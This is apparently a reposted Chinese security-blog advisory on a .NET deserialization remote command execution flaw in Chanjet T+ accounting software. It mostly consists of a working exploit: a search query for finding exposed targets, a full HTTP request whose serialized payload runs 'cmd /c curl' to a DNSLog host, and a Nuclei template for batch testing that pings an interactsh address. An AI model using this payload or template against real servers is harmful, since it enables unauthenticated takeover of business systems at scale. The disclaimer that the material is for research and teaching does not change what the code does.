畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

admin

138635
文章

114
评论

2024年4月8日11:00:05评论48 views字数 2069阅读6分53秒阅读模式

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

漏洞简介

/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在.net反序列化漏洞，未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。

漏洞复现

步骤一：使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法app="畅捷通-TPlus"

步骤二：使用以下数据包进行命令执行测试并查看其DNSLog记录可得存在命令执行漏洞...

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/jsonContent-Length: 614{  "storeID":{    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",    "MethodName":"Start",    "ObjectInstance":{        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",        "StartInfo": {            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",            "FileName":"cmd", "Arguments":"/c curl 9o4ip1.dnslog.cn"       }    }  }}

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

步骤三：执行命令并记录到对应的文件中...在从浏览器中进行访问获取命令执行结果...。

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

批量脚本

id: cjt-rceinfo:  name: cjt-rce  author: ly  severity: highhttp:  - raw:      - |        POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36        Connection: close        Content-Type: application/json        {          "storeID": {            "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",            "MethodName": "Start",            "ObjectInstance": {              "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",              "StartInfo": {                "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",                "FileName": "cmd",                "Arguments": "/c ping {{interactsh-url}}"              }            }          }        }    matchers:      - type: word        part: interactsh_protocol        words:          - "dns"

原文始发于微信公众号（揽月安全团队）：畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信